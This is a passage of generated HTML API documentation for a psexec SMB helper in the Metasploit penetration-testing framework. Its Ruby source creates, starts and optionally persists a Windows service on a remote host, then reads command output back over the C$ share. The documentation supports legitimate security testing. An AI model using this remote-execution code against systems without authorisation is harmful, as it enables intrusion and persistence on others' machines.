<span class='kw'>when</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to create service, ACCESS_DENIED, did AV gobble your binary?</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Failed to create service, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>No service handle retrieved</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_service_description'>service_description</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Changing service description...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_changeservicedescription'>changeservicedescription</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_description'>service_description</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Starting the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_startservice'>startservice</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_svc_status'>svc_status</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service started successfully...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_FILE_NOT_FOUND</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start - FILE_NOT_FOUND</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start - ACCESS_DENIED</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SERVICE_REQUEST_TIMEOUT</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service start timed out, OK if running a command or non-service executable...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='comment'># If service already exists don't delete it!
|
||
</span> <span class='comment'># Maybe we could have a force cleanup option..?
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_service_exists'>service_exists</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Not removing service as it already existed...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>elsif</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Not removing service for persistence...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Removing the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_deleteservice'>deleteservice</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>==</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Successfully removed the service</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to remove the service, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Closing service handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_closehandle'>closehandle</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_disconnect'>disconnect</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\IPC$</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>true</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="service_description-instance_method">
|
||
|
||
#<strong>service_description</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_DESCRIPTION option</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>the service description.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
60
|
||
61
|
||
62</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 60</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_service_description'>service_description</span>
|
||
<span class='ivar'>@service_description</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DESCRIPTION</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="service_name-instance_method">
|
||
|
||
#<strong>service_name</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_NAME option, generate a random one if not already set.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>service_name the name of the service.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
43
|
||
44
|
||
45
|
||
46</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 43</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_service_name'>service_name</span>
|
||
<span class='ivar'>@service_name</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='ivar'>@service_name</span> <span class='op'>||=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="smb_read_file-instance_method">
|
||
|
||
#<strong>smb_read_file</strong>(smbshare, host, file) ⇒ <tt>String</tt><sup>?</sup>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieves output from the executed command</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>smbshare</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>The SMBshare to connect to. Usually C$</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>host</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Remote host to connect to, as an IP address or hostname</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>file</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Path to the output file relative to the smbshare Example: 'WINDOWSTempoutputfile.txt'</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>output or nil on failure</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
72
|
||
73
|
||
74
|
||
75
|
||
76
|
||
77
|
||
78
|
||
79
|
||
80
|
||
81
|
||
82
|
||
83
|
||
84</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 72</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_smb_read_file'>smb_read_file</span><span class='lparen'>(</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='comma'>,</span> <span class='id identifier rubyid_host'>host</span><span class='comma'>,</span> <span class='id identifier rubyid_file'>file</span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_file'>file</span> <span class='op'>=</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_open'>open</span><span class='lparen'>(</span><span class='id identifier rubyid_file'>file</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>o</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_contents'>contents</span> <span class='op'>=</span> <span class='id identifier rubyid_file'>file</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span>
|
||
<span class='id identifier rubyid_file'>file</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='id identifier rubyid_contents'>contents</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB.html" title="Rex::Proto::SMB (module)">SMB</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions.html" title="Rex::Proto::SMB::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions/ErrorCode.html" title="Rex::Proto::SMB::Exceptions::ErrorCode (class)">ErrorCode</a></span></span><span class='comma'>,</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>RubySMBError</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to read file </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file'>file</span><span class='embexpr_end'>}</span><span class='tstring_content'>. </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='embexpr_end'>}</span><span class='tstring_content'>: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>nil</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
</div>
|
||
|
||
<div id="footer">
|
||
Generated on Fri May 8 17:02:25 2026 by
|
||
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
|
||
0.9.37 (ruby-3.1.5).
|
||
</div>
|
||
|
||
</div>
|
||
</body>
|
||
</html> |